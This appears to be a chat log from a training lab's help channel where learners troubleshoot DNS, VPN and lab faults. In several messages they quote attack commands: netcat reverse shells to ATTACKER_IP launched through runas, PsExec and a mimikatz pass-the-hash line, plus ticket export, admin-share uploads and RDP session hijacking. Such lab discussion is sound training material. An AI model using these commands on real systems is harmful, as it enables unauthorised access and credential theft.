After setting all the Metasploit options I got this result:
[*] Started reverse TCP handler on 127.0.0.1:8989
[*] Using URL: http://thmjmp2.za.tryhackme.com:7777/wTPndpwdZls3vfc
[*] Server started.
[*] Sending a malicious request to /
[*] Server stopped.
[*] Exploit completed, but no session was created.
I already have an SSH connection with tunneluser.
On that connection I got the following message after running Metasploit:
"connect_to thmdc.za.tryhackme.com port 80: failed."
Not sure if you got an answer but i had the same this morning and i just downloaded a new VPN file and issue was gone.
Hi, I just started Lateral Movement and Pivoting and started with an issue (I just wrote the solution for a colleague just above), but I want to follow the indications word by word. It asks me to run:
systemd-resolve --interface lateralmovement --set-dns $THMDCIP --set-domain za.tryhackme.com
When I run that (replacing the IP, obviously) it seems systemd-resolve does not come by default (as many say). I googled it and it says to run the below:
apt install systemd-resolved
Once it's finished I tried again, with the same effect. When I check what options I have with systemd this is the result:
i usually would populate /etc/hosts or /etc/resolv.conf
and good to go
but i want to figure this out
any help?
well, after simply adding an entry to /etc/hosts I can actually do nslookup perfectly, but when I try to go to the distributor to get the credentials, it's not working
For whatever reason, I don't have the lateralmovement interface defined in the attack box
The previous rooms in this series worked flawlessly. this one is not behaving like the others
Did you open an attackbox in the Lateral room?
I did. I even terminated it and tried to restart it in the room, twice
ip a shows enumad but not lateral
What interfaces do you have?
lo
ens5
enumad
docker0
veth22e29e2@if5
veth0f22abb@if7
When I was doing the enum room yesterday, i had interfaces for all the ad rooms
I'm going to boot one up.
I got one for lateral.
hmm
I see there's a folder with network configs on the attack box, is there a way for me to manually apply it?
I'm not sure, regarding the attackbox
I'm going to try terminating the box, logging out, logging back in and relaunching
ok so I did that and it didn't work, but I noticed something odd
The lateralmovement and pivoting file is empty
Might have to try this later from my own Kali VM instead
That would be better.
i think i figured it out @feral granite
I went to https://tryhackme.com/access?type=networks and selected the lateralmovementandpivoting from the dropdown and regenerated my configuration and downloaded it
Then I terminated and restarted the Attack box and it had the interface
add it to the kb if anyone else has a similar issue
Ah, there we go
I'm not getting a shell, guys, please help
this also not getting connection back
any help
and the solution is to use windows/shell_reverse_tcp
if you are not using metasploit
Someone that would be so kind of sparing 5 mins to guide me through the initial setup of the lab?
What do you need help with?
the dns setup. I think we've spoken in the past but i think it wasn't really clear to me
What subnet? You can also vote for a reset yourself once every hour.
i can't ping the DC.
can somebody help?
THM says that I am connected on the "Connection" page.
Is the DC windows?
So you can't ping most Windows machines by default.
yes but the DNS resolution is failing too.
ok, I resolved it. My network manager didn't restart properly.
Help me in this too
I'm getting same issue
Dns resolution failing
Also, every time I have to change my resolv.conf to 8.8.8.8 to use the internet. I can't use the internet before doing this setting, need help with this too
There are no URLs in that message.
hi, can someone please vote for resets on https://tryhackme.com/room/lateralmovementandpivoting the jmphost2 machine is broken
Probably better stating your subnet.
If 15 people reset and they're not even in your subnet..
Hi all! [Task 7] - RDP Hijack. I'm attempting to hijack a RDP session however getting user/pass incorrect. Anyone run into anything similar?
(running with administrator priv on cmd)
[solved] - had to upgrade privs!
Hello, I have a question about attack techniques.
I have one machine A at 192.168.20.0/24, two machines B and C at 192.168.120.0/24. I was able to attack and get privileges on machine B, as well as Pivot from machine B to attack machine C. But what I can do is just operate through the Web Shell available on machine C. So how? Can I create a Reverse Shell from machine C back to my machine A? Any keywords or articles on this matter would be welcome, I would greatly appreciate it.
Sincerely, thanks
Have a feeling I'll be needing some help getting through this AD part of the CompTIA Pentest+ path. If anyone else wants help or to work together lmk. I'll provide what advice I can in return.
hello, I am doing Windows - Lateral Movement and Pivoting - Abusing User Behaviour. I cannot get the credentials at http://distributor.za.tryhackme.com/creds_t2 to start the task. The network state is running and started. openvpn is on. Had no issues connecting with the network until now. Can't connect to server...
Can't seem to get the ptt attack to work. I've tried both t1_toby.beck tickets and keep getting the same error.
* File: '[0;2f49e9]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi': ERROR kuhl_m_kerberos_ptt_data ; LsaCallAuthenticationPackage KerbSubmitTicketMessage / Package : c0000133
ERROR kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage c0000133
* File: '[0;9c65b]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi': ERROR kuhl_m_kerberos_ptt_data ; LsaCallAuthenticationPackage KerbSubmitTicketMessage / Package : c0000133
ERROR kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage c0000133
hi, someone have a problem to ping to thmiis machine?
nevermind, i resolved it
Guys, I am connected to my machine via SSH but when I run msf I get the following. Any ideas what is wrong?
Nvm did more reading in the Discord and it worked by replacing the name with IP
Is the LHOST correct, or can it be accessed from the target machine?
Hi, I am going through Lateral Movement and Pivoting room. When signed in to thmjmp2 with provided credentials, I cannot find the mimikatz executable in C:\Tools. According to description it should be there. How can I get it back?
Hello everyone. I have an issue regarding Remote Process Creation using WMI. I logged on the THMJMP2 using the account that is in Tier 1 Admins group (t1_corine.waters). From THMJMP2 I execute wmic /node:10.200.104.201 process call create "cmd.exe /c whoami" just to test if it will fail. I have ERROR: Description=Access denied
I also tried putting the full command
de:10.200.104.201 process call create "cmd.exe /c whoami"```
Any ideas?
I haven't confirmed, but it's probably not enabled or permissions are not in place. For example if you just run "wmic process call create whoami" on thmjmp2, you also get access denied. To set up the permissions to make it work, you can use GPO/LPO to do that.
I guess it is because it is deprecated? I am not sure - the server is Windows 2016 Datacenter
it is for win10+ and server 2022+, but in this case, I think it's just not configured to allow usage
Hi guys, I have some questions, please if you can clarify it for me, we have t1_leonard.summers with admin access:
- I can use this account to connect directly via SSH to THMIIS, but I can't read the flag.exe file, why?
- I created a reverse shell binary and uploaded it to THMIIS, used t1_leonard.summers to access THMJMP2 via SSH, from there I used sc.exe to start the service and got the shell with an nt authority\system session. Why does it work without having to use runas.exe?
- flag.exe checks to be sure you connected using a windows/shell/reverse_tcp shell
- sc.exe, by default (as far as I know) creates services as SYSTEM unless you specify a username. The fact that you're creating the service as a particular user does not make that service run as that user by default.
- So here, the challenge was like this, but in the real world for example, if we already see that this founding account has SSH access to another machine, then we don't need to think about going through the reverse shell, yeah?
Correct.
If you don't want to maintain a persistent connection to the target victim you can use the jump host to connect to the victim and do, let's say, a one-shot activity. But what happens if you lose the jump host connection and you won't be able to access the victim (in a scenario where only from the jump host you can access the victim)? If you want to maintain persistence I think it is always preferable to use a reverse shell. Similar analogy to bind/reverse shell.
I still create a backdoor when I get some machine
@weary torrent @frank heath @swift crater thank you guys 
Gave +1 Rep to @weary torrent (current: #423 - 10)
I'm stuck on Task 3. I think I'm supposed to open a reverse shell from JMP2 to the Attackbox, with elevated privileges, using the runas /user:t1_guy command, but it just gives me a shell with the same user. (I suppose that I must be the t1-guy, to be able to create the service with sc.exe in the next step.)
Why would "runas /user: ..." fail silently, (and instead run the command as the calling user), when given valid credentials for the t1 user?
Solution: I had to switch to Remote Desktop for the unprived user. The runas step didn't work when connected by SSH.
I guess this is due to how UAC works.
The task mentions this: "Still, we only have SSH access to the machine, so if we tried something like runas /netonly /user:ZA\t1_leonard.summers cmd.exe, the new command prompt would spawn on the user's session, but we would have no access to it. To overcome this problem, we can use runas to spawn a second reverse shell with t1_leonard.summers access token:" So to get access, the runas can be used to spawn a shell.
@weary torrent I don't think the indirection via 'nc' adds anything, privilege-wise.
Correct it doesn't, it's to illustrate the limitations of runas in an SSH environment (say RDP was unavailable).
Lesson learned, fwiw.
Same problems here.. I did the following and downloaded myself
Attackbox:
- Download https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919
- Extract contents.
- Run "python3 -m http.server 8080"
THMJMP2:
- SSH to the THMJMP2 server following the room steps as you would normally.
- The SSH session will be a CMD session, uplift to PowerShell.
- Change directory to C:\Tools\
- Download Mimikatz.exe from your Attackbox python http server "wget http://<ATTACKBOX_LATERALMOVEMENT_IP>:8080/x64/mimikatz.exe"
- You can now run .\mimikatz.exe and carry on with the rest of the room.
enjoy
I have some error on the RDP Hijacking part. I just connected with RDP to the server with credentials from http://distributor.za.tryhackme.com/creds_t2
Could not connect sessionID 7 to sessionname rdp-tcp#51, Error code 1326
Error [1326]:The user name or password is incorrect.
I tried to attach my SESSION represented by rdp-tcp#51 to ID 7 owned by t1_toby.beck2 (tried with other IDs also)
Thank you very much, @near cloud. I will try it.
Gave +1 Rep to @near cloud (current: #1967 - 1)
According to my notes, you have to be system. So "psexec.exe -s cmd.exe" (whoami to verify), and you can then tscon to one of the disconnected sessions.
I thought Administrator privilege will be sufficient but apparently you need to be SYSTEM - it was written though, Thanks Sir No1
Gave +1 Rep to @weary torrent (current: #392 - 11)
hi .. I ran my VPN file for lateral movement and it's running ... how do I configure the DNS?
I did what I know from breaching AD and from enumeration AD but still cannot nslookup za.tryhackme.com. Should I start the network room first before setting up the VPN?
but the network was started
nvm, I solved it ..
I am using THMJMP2 and tried using mimikatz, got an error
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
Can somebody tell me why ?
You logged in as t2_felicia.dean?
Yups… I finished, but what's the diff between SSH and RDP? When using RDP that error occurs
hello guys, I have a question please, why when using "Installing MSI packages through WMI" I have access as "authority system", but when I did the same thing by using "Remote Process Creation Using WMI" it gives me access as "za\t1_corine.waters"?
i created a .exe payload and i uploaded it to the THMIIS, so in the THMJMP2 i did:
PS C:\Users\bradley.cook> $Command = "powershell.exe -command Start-Process -FilePath 'C:\Windows\myinstaller.exe'"
so in the metasploit i got:
C:\Users\t1_corine.waters\Desktop>whoami
whoami
za\t1_corine.waters
C:\Users\t1_corine.waters\Desktop>flag.exe
flag.exe
Sorry! You are still missing something. No flag for you yet. (1)
does the ZA.TRYHACKME.COM\t1_leonard.summers account get locked out after too many failed attempts? I can get the EZpass4eve password to work
Thank you
Gave +1 Rep to @near cloud (current: #1313 - 2)
Mimikatz is still not downloaded in THMJMP2 in C:\tools
users have to download it manually
No flag on t1_toby.beck's Desktop
@shadow linden It looks like the Windows Defender quarantined both mimikatz and the flag on t1_toby.beck's Desktop. The room can't be completed because of this
Also, I got a shell as t1_toby.beck and was able to see the Administrators' Desktop files. I don't know if that should be possible but I was expecting an Access denied message (I'm a noob tho)
You do not need that on THMJMP2, the tools are already on THMJMP1, don't you? You just need to log in with creds for that box.
i have this:
"mimikatz # token::revert
mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"
Notice we used token::revert to reestablish our original token privileges, as trying to pass-the-hash with an elevated token won't work. "
Can someone please explain to me what "token::revert used to reestablish our original token privileges" means?
Why would one like to switch to the target's native shell (Like CMD in a Windows target) from the Meterpreter?
In which commands/operations should he do that?
That's a different machine, the task is telling you to ssh into THMJMP2 and execute Mimikatz there. But the Box had some issues with firewall so mimikatz was quarantined.
CMD and PowerShell have their own tools and languages that you can use, but no one can really tell you in which operations you should do that because it's situational, and you will later come across some of these situations if you keep studying
One example would be Task 4 in this room "Moving Laterally Using WMI" where you have to use PS
uploading it with samba
Downloading it from github is faster lol
I tried samba but I was googling for too long for the commands
smbclient -c 'put file.msi' -U t1_corine.waters -W ZA '//thmiis.za.tryhackme.com/admin$/' password_corine.waters
Thanks bro Ill write it in my notes
Gave +1 Rep to @swift crater (current: #313 - 14)
no prob, I just need to read carefully and follow the step by step. They were in there and added some logic to follow the right step.
a little mistake can make you go back to the beginning again.
Yep
If lsass pulls the hash values from memory while dumping, How can I get the information of the entered users before the computer is restarted? I performed the lsa dump with Crackmapexec and how did I obtain the hash value of the Administrator user that I logged into 20 days ago on the win10 computer in the AD environment?
could someone please vote for a reset?
which subnet
it just rebooted, but thanks^^
Hey guys
When I run the psexec64 command shown below with the user t1_leonard.summers and password, I get access denied error
I am running this command from the jump host
I know that this isn't the "intended" way. However the description states that it should work
maybe you need to open said terminal in administrator mode
I SSH into the jmp machine with my generated creds. How can I open an admin cmd?
ah.... well dunno then
To run psexec, we only need to supply the required administrator credentials for the remote host and the command we want to run (psexec64.exe is available under C:\tools in THMJMP2 for your convenience):
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe
This what the task states
maybe you need to use rdp
hello everyone, please can you tell me if there is a problem on "Lateral Movement and Pivoting"? It's not working for me, Network state: Resetting since yesterday
Try to leave and rejoin the room
it works now, thank you bro
Gave +1 Rep to @tacit rivet (current: #86 - 72)
Hello everyone, I'm having an issue with room Lateral Movement and Pivoting.
Every machine seems to be offline. Network state is running, webpage is refreshed, my VPN connection is OK, reset is 1/5...
Can someone help me?
Anyone able to assist? I'm on the part where I create a nc session with the administrator account. I run "nc -lvp 4443" in one terminal window, then I run "runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.10.201.140 4443"" in the SSH session with my user, and the shell just never comes up. I'm not sure what I'm doing wrong
So I realized what I was doing wrong with that part: I needed to use the IP address from the lateralmovement interface I established, which was a dumb mistake... except now my DNS has just stopped working, and I can't ping anything on the network I'm supposed to be moving around in
and systemctl restart systemd-resolved did not fix the issue at all
Hello Guys! Could someone help me to setup Network OpenVPN on Kali?
I'm connected to the network, but I should configure my DNS.
I'm trying to follow the description in the room:
Network Manager -> Advanced Network Configuration -> Your Connection -> IPv4 Settings
Set your DNS IP here to the IP for THMDC in the network diagram above
Add another DNS such as 1.1.1.1 or similar to ensure you still have internet access
Yeah, don't use the GUI.
Edit your resolv.conf file.
/etc/resolv.conf
Check the #breaching-ad pinned posts, and take my steps and apply it to this room.
Alright! I'll take a look.
@feral granite I appreciate all your help man! One day I'll get you a beer!
I probably will have a lot more question in the future 
Hey all I'm getting channel_setup_fwd_listener_tcpip: cannot listen to port: 6666
bind [10.50.65.127]:7878: Unknown error
channel_setup_fwd_listener_tcpip: cannot listen to port: 7878
Could not request local forwarding.
when attempting to initiate the SSH tunnel for the last flag. I've tried a few different things and still can't get this working.
The command:
ssh tunneluser@10.50.65.127 -R 8888:thmdc.za.tryhackme.com:80 -L 10.50.65.127:6666:127.0.0.1:6666 -L 10.50.65.127:7878:127.0.0.1:7878 -N
Not sure where I'm messing up
I'm afraid I'm still unable to connect. I left the room as well. I regenerated the Network VPN as well.
Ping the address works
Edited the resolv.conf file with the IP on top
Try sudo.
Same.
Can you access this site? http://distributor.za.tryhackme.com/creds
Yeah. Just tried it
In this case, the problem is with nslookup?
But the rest should work?
If the link works, yeah.
Don't worry about nslookup
Okay then. Thanks. Have a good day! Wish me luck
Hello @ all
Network is still resetting? Displaying this for quite long
So this has been the single most frustrating room on TryHackMe... I realize the other two posts I made here were my own dumb mistakes due to me not reading directions or pinned comments... so I understand why I was ignored. However, this time I'm completely at a loss. I'm on task 6, I generated the new t2 credentials on the new credential page, then when I try to RDP into THMJMP2 with xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_jessica.richards /p:o6R9PfosU the xfreerdp window opens, then gives me a bad password error; when I retype the password into the login window I get a bad password error again. I've generated new credentials thinking that maybe there was a problem with the page that makes them, and gotten the same result. Now, the really confusing part is this: if I present the wrong credentials to the xfreerdp command by changing the username or password, the command fails with an "Error: protocol security negotiation or connection failure" message in the terminal. So it's like the remote server knows that I'm presenting the correct credentials, but they aren't correct.
this same thing was happening to me, so i just logged on without using the /p:password
xfreerdp /v:ip_of_thmjmp2 /u:rick.ross
this box has been resetting all day
Can someone please fix this network? It keeps resetting, for 2 days now.
Okay i had to leave the room and rejoin. Now it is working.
Is anyone else having trouble with the Attack Box in this room? Every time I start it, it is missing the "lateralmovement" interface. That seems to be set up by an OpenVPN config that is downloaded from S3 when the Attack Box starts - but the file it is downloading is 0 bytes.
Hi, the room is in resetting mode since probably 15th, does anyone know something?
try and leave the room for 15 mins and joining back again. Then setup with the DC IP. it should work
ssh za\t2_felicia.dean@thmjmp2.za.tryhackme.com
ssh: connect to host thmjmp2.za.tryhackme.com port 22: No route to host
I got this error after I forgot to extend the network and it stopped. I am able to visit distributor site though.
what worked for me in the past with these AD rooms is you leave the room by clicking on the cog wheel and clicking "leave room"
then join back after 15 mins and reconnecting with the open vpn file
my issue now is that I cannot connect to this felicia.dean account even when I type in the correct password.
maybe I have to try once more and stop feeling sorry for myself
Hi folks, is anyone experiencing in task 3 that the t1_leonard.summers/desktop folder is empty, no flag.exe there?
you can just add the host to your /etc/hosts file or just use the ip instead of the fqdn
damn son, nvm
That's the spirit
trying to do this room and the C:\tools directory is empty on THMJMP2 where the command in task 3 is saying to run nc64.exe out of there. Anyone else experience this?
I went ahead and voted for a reset but it's only 2/5 so I guess I wait.
after reset the file was back. I see someone else is dropping files in the c:\tools directory like crazy and perhaps wiped out nc64.exe & others when they tried to clean up. if you run into what I sent above, vote for reset or find a way to copy nc64.exe back to THMJMP2. I kept getting access denied when I tried copying from THMIIS.
drop into another dir
make sure you have perms in it
I finished that a couple days ago. The permission error I was getting was because that user did not have access to that server as I recall
either way, I was only attempting to copy that file over because someone had wiped out the tools directory and screwed everyone else over. the reset fixed that and put the file back
https://imgur.com/doxok9X I'm stuck on TASK 3 of this room, well the side mission, been trying to solve with PSexec. I get a shell on the THMIIS machine as t1_leonard.summers, which is shown in the image. However when I go to open the flag I get "Sorry! You are still missing something. No flag for you yet." but I can't think of what step I have missed? Has anyone got a step by step or can offer up a clue? I used PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever -accepteula -i c:\tools\nc64.exe -e cmd.exe 10.50.89.29 4445 to get the shell. I presume this is the correct method? Any help would be appreciated, I think I'm on the right path...
You can verify your account to upload the image
maybe you missed escalating privilege to nt administrator
trying to start this room by following the instructions, but no luck
i checked and lab is up, not sure what else I can do
tried the same thing from kali
got it to work with attackbox after leaving and entering the room multiple times....very finicky lab
Still having this problem on Task 3, I'm running as system but still no flag, this is using the PSexec method. I'm clearly not understanding something properly; if someone could help me out it would be much appreciated
mimikatz showed disconnected all of a sudden
OMG I was just searching for answers for the same question and found your answer... it just unstuck me.
yo
anyone got some insight on SMB relay over pivot
I got a diagram I want to share and see if I can get some insight. I was told to diagram my setup and TR. Kinda need some help
Hello, I am doing the lateral movement room, but I'm having trouble connecting to the network. I ran the command to configure the DNS with the THMDC IP but when I do nslookup it fails. I also tried from Kali with Network Manager but it failed too. Would it be possible to get any help?
I also tried on the Kali by inserting the IP in the DNS section of the IPv4 settings of my connection and resetting Network Manager but it's not working.
Add the THMDC to /etc/resolv.conf
Hey, did this work? And if yes, how did you fix it?
My problem was different as I recall. I had found that someone had emptied the C:\Tools directory and so I didn't have the nc64.exe executable. It's been a minute so I might have some details wrong
Yeah, the AD of tryhackme has a lot of problems.
This is a good way to troubleshoot problems you may encounter on your own.
Funny how the same issues still happen on t1_toby.beck since 2022 without any answers on what's going on hahaha
Another case of t1_toby.beck with no ticket at all
and sekurlsa::tickets /export running for 5 real minutes non-stop with a bunch of t1_toby.beck, t1_toby.beck2, t1_toby.beck3, t1_toby.beck4, t1_toby.beck5, t1_toby.beck6
So I was connecting to WMI from PowerShell, and I had an RDP session running.
When I tried Invoke-CimMethod, it gave me return value 3, which basically means incorrect registry permissions. However when I tried the same with an SSH session, it worked. Is there any specific reason why?
I have the same problem. Did you solve the problem ?
Coming a bit late probably
Maybe this message will help you: #site-support message
Go back in that message chain for more context
Anyone else have trouble just connecting via SSH to the machine? As soon as I try to connect, the connection immediately closes. Tried a few different times now over a couple of days.
Is that a mistake in the Description or am I missing something?
In the command Dynamic should use -D instead of -R, right?
Another thing I need some help with... At the Port Forwarding section, at the end by the Exploit...
How am I supposed to discover that open port for myself?
I tried many different nmap scans, but I can see it's only filtered.
I tried through a Dynamic Proxy as well, but still Filtered.
How can I discover that there is HTTP running?
Seems that the network isn't working since yesterday already, or is it just me?
error: Cannot ioctl TUNSETIFF lateralmovement: Device or resource busy (errno=16)
I have just been able to do Task 1, both with the AttackBox and my own local Kali VM
I have noted some changes over the past 24-48 hours for that network: before, on the AttackBox, you had to use the VPN, as there was an issue; that issue seems to have gone: the lateralmovement interface is there for you automatically (in addition to interfaces for other networks, like persistad for instance)
if you use the VPN, one trick that usually works if you cannot ping the DC, is to regenerate the VPN (I had to do it 20 minutes ago)
in case you keep having issues, please share screenshots, and I'll compare them with my side
Ah yea...thanks. The issue was, that they resolved their issue
Network still not working, or is it me? I tried to regenerate the VPN, got the green light on access but couldn't access the creds page after adding the IP to the IPv4 settings and restarting NetworkManager.
Disregard, I got it working on the attackbox. Just won't work on my Kali laptop.
Actually, I'm just a moron and entered the wrong IP on my laptop. 
I'm solving the AD labs lateral movement and pivoting; when I'm creating the sc task to run THM they give access denied? Why? How can I solve it?
Ignore spelling.
Rather aggravating. The ssh keeps timing out on Task 7. Re-entered everything several times.. yet still times out and will not make that call from socat listener in THMJMP2.
MIMIKATZ is missing from thmjmp2. I have uploaded the exe from my attackbox but it's never there when I go to run it. Is Defender deleting the file as soon as I upload it?
As per the documentation, the web based attack box should be able to ping the DC but this is not the case with me. Please guide.
I am getting Destination Host Unreachable
Please do not multipost: the same message in multiple channels is not nice.
I have answered to you in #site-support
Smh it can't dump the las
Hi,
I'm on Task 6 Abusing User Behaviour, similar with Task 7 Port Forwarding
THMJMP2 via RDP
xfreerdp /v:thmjmp2.za.tryhackme.com /u:YOUR_USER /p:YOUR_PASSWORD
Using Kali, I keep getting this error:
[07:13:48:067] [1151360:1151361] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[07:13:48:068] [1151360:1151360] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
If using AttackBox it's working.
Anybody knows the fix?
Thank you
got it fixed by adding /timeout:10000 /cert:ignore
xfreerdp /v:THMJMP2.za.tryhackme.com:13389 /u:Username /p:Password /timeout:100000 /cert:ignore
Hello, let me try to see if I can replicate the issue.
Leave the Network (Options > Leave) and rejoin the room, and it will work. The error message can be improved on the room page. The real reason it fails is because (in the system) you are no longer in the subnet network, so leaving and rejoining fixes that.
thank you for the help
Gave +1 Rep to @latent owl (current: #16 - 487)
it works
I'm having the same issue... have you been able to solve it?
my bad... I was using the attack box and didn't properly read the end of the Introduction section:
If you are using the AttackBox and have joined other network rooms before, be sure to select the IP address assigned to the tunnel interface facing the lateralmovementandpivoting network as your ATTACKER_IP, or else your reverse shells/connections won't work properly. For your convenience, the interface attached to this network is called lateralmovement, so you should be able to get the right IP address by running ip add show lateralmovement
However I have a question: if I have the credentials for t1_leonard.summers, why can't I just directly SSH to thmiis with his credentials instead of using all these rev shells? If I do that I can see that I'm not nt authority but just t1_leonard.summers. How can I elevate from there?
Am I crazy or does THMJMP2 not have SSH client installed on it? Working on lateralmovementandpivoting > Port Forwarding > Tunnelling Complex Exploits > "Putting the whole command together, we would end up with the following:"
Oh weird, it's on path for cmd but not for powershell
Hello guys,
I am having an issue with the attackbox when resolving the DNS for THMDC. Any suggestions?
Error: Failed to resolve interface "lateralmovement": No such device
solved
Hi guys,
I'm having issues with the DNS from attackbox. I'm doing the instructions from the introduction but I'm not able to resolve the domain:
root@ip-10-10-252-163:~# THMDCIP=10.200.48.101
root@ip-10-10-252-163:~# systemd-resolve --interface lateralmovement --set-dns $THMDCIP --set-domain za.tryhackme.com
root@ip-10-10-252-163:~# nslookup thmdc.za.tryhackme.com
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
Any idea?
Solved by updating the file /etc/resolv.conf
Hello, I am doing the lateral movement room, I am trying to perform a pass-the-ticket attack but I do not seem to get any additional permissions by doing so. I export the tickets with mimikatz and inject a TGT into the session with mimikatz. After which I tried to run PsExec, Misc::CMD, query SMB and so on but I do not seem to have any additional permissions. Am I doing something wrong? Edit: I am using the ticket of the t2_felicia user which has local administrator permissions.
hello, I need help with DNS resolution. I'm trying to resolve thmdc.za.tryhackme.com with nslookup but it is giving me a recursion error
nslookup thmdc.za.tryhackme.com
;; Got recursion not available from 10.200.48.101, trying next server
Server: 8.8.8.8
Address: 8.8.8.8#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
It only works when I explicitly mention the DNS IP
nslookup thmdc.za.tryhackme.com 10.200.48.101
Server: 10.200.48.101
Address: 10.200.48.101#53
Name: thmdc.za.tryhackme.com
Address: 10.200.48.101
- it's happening for all the domain resolutions
But when I use my browser I can resolve distributer.za.tryhackme.com
My resolv.conf configuration:
# Generated by NetworkManager
search localdomain
nameserver 10.200.48.101
nameserver 8.8.8.8
nameserver 192.168.177.2
My route table:
10.50.46.0 0.0.0.0 255.255.255.0 U 0 0 0 lateralmovement
10.200.48.0 10.50.46.1 255.255.255.0 UG 1000 0 0 lateralmovement
Any help will be appreciated.
It has been fixed, only had to reset the network.
Be me.. Spending an hour figuring out why my reverse shell with the service was not working. Found my NIC on the attack machine changed so my msfvenom payload had the old value.
Was fun to research why. Got to use PSSession to remote into the host so I could verify my payload was actually in ADMIN$ and that the service specified the correct destination.
Check dnsmasq.service next time it happens
I am wondering why I should use thmjmp2 to get to thmiis, because t1_leonard.summers was already given as user and the password was also provided; why should I do lateral movement in this case, when we can directly connect to it using SSH?
If I'm not mistaken, the SSH is a port that is open by default on most THM machines just in case.
So in the case of this room, you just have to pretend that SSH doesn't exist, and this is how you can do lateral movement.
Thank you
Gave +1 Rep to @whole ember (current: #77 - 112)
I might need someone to reset the network. The network stopped and after restarting, my machine refused to resolve any domain in the network. Thank you
I might need someone to reset the network, someone removed the mimikatz. Thanks
Hi! I think the network needs to be reset. I can ping the THMJMP2 with IP, but not THMDC
┌──(kali㉿kali)-[~/tryhackme/ad_lateral]
└─$ nslookup thmdc.za.tryhackme.com 10.200.51.101
;; communications error to 10.200.51.101#53: timed out
;; communications error to 10.200.51.101#53: timed out
;; communications error to 10.200.51.101#53: timed out
;; no servers could be reached
┌──(kali㉿kali)-[~/tryhackme/ad_lateral]
└─$ ping 10.200.51.101
PING 10.200.51.101 (10.200.51.101) 56(84) bytes of data.
^C
--- 10.200.51.101 ping statistics ---
178 packets transmitted, 0 received, 100% packet loss, time 181756ms
┌──(kali㉿kali)-[~/tryhackme/ad_lateral]
└─$ ping 10.200.51.249
PING 10.200.51.249 (10.200.51.249) 56(84) bytes of data.
64 bytes from 10.200.51.249: icmp_seq=1 ttl=127 time=129 ms
64 bytes from 10.200.51.249: icmp_seq=2 ttl=127 time=48.8 ms
64 bytes from 10.200.51.249: icmp_seq=3 ttl=127 time=63.4 ms
^C
--- 10.200.51.249 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2024ms
rtt min/avg/max/mdev = 48.773/80.500/129.284/35.011 ms
In Task 5, are all Pass-the-Hash, Pass-the-Ticket and Pass-the-Key possible? I succeeded using PtH and PtK, but did not find a ticket for t1_toby.beck?
I am in the room Lateral Movement and Pivoting, task 4 Moving Laterally Using WMI. I followed the instructions and got the flag via Installing MSI packages through WMI. Then I played around and tried to do the same by creating a remote process using WMI; I got it working but at the end, it said I am still missing something and no flag for me. Anyone know the reason why?
Was it the payload? Or the way the payload was uploaded to the THMIIS target machine? Any feedback appreciated. Thanks
All three worked for me.
My mimikatz.exe is missing from the felicia machine!?
I'm working on Task 2, and when I use runas with Leonard's creds to get a reverse shell back to my box, it doesn't appear to run as Leonard. When I type whoami in the resulting shell, I'm the user I'm logged onto ssh as
Huh. It seems like it works anyway though
mimikatz just disappeared on the THMJMP2 machine when I was in the middle of using it. It was there in C:\tools then disappeared after I used it
mimikatz is still not on the t2_felicia.dean@thmjmp2 machine. This is starting to get irritating
In Task 7, I cannot SSH to the tunneluser I created on my Kali VM. I'm using ssh tunneluser@<lateralmovementIP> and it times out. Also, in the Attack Box, even after adding the THMDC to the resolv-dnsmasq and nslookup will resolve the IP, the creds site isn't accessible on the Attack Box. I can access it on my Kali VM when connected through OpenVPN but not the Attack Box. This room needs some attention.
Check that the interface is up. I just tried and it was not on there, even though I started the AttackBox from that room.
Hi, I am actually struggling to use mimikatz. I have this output when I run privilege::debug : ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
I give up, I'm gonna try to sleep
With, for example, uploading an msi and running it using wmi. Does the upload using smb to /admin$/directly place the msi in C:\Windows\? Like is that share directly connected to that directory? And if this share is not available, could I upload it to a different share and use that path in the Invoke-CimMethod?
Why does nslookup time out when it was working completely fine?
nslookup thmdc.za.tryhackme.com
;; communications error to ::1#53: timed out
Server: ::1
Address: ::1#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
And what is the proper way to reset everything so I can set up again from scratch?
@whole ember @gilded zephyr Spammer (sorry I don't know how to properly ping the mod group)
the network diagram was like greyed out for two days and this solved it, thank you very much
Gave +1 Rep to @latent owl (current: #17 - 576)
I believe this is explained in the intro of the room, but using the Leave Room options has also worked for me to get it working from scratch
systemctl restart dnsmasq has also helped me in the situation. I've also been able to visit the different sites (to get credentials) even if nslookup wasn't responding properly
Hello. I cannot ping the thmiis from the jump machine, but I could use SMB to send the reverse shell there. Strange. When I try runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" from the jump, of course my attacker machine never sees anything. OK, I understand ping is not allowed (I get it now) but sadly the attacker machine never gets anything. I will do it again later but I wonder if someone had the issue and maybe I have done something stupid which explains it, but I don't understand. Have a nice day
anybody else getting a restart pause loop every 2s with a sigint soft, connection-reset restart?
This VPN and this room are janky.
Is anyone having the same problem as me?
c:\Users\t1_leonard.summers\Desktop>whoami
whoami
nt authority\system
c:\Users\t1_leonard.summers\Desktop>FLAG.exe
FLAG.exe
Sorry! You are still missing something. No flag for you yet. (6)
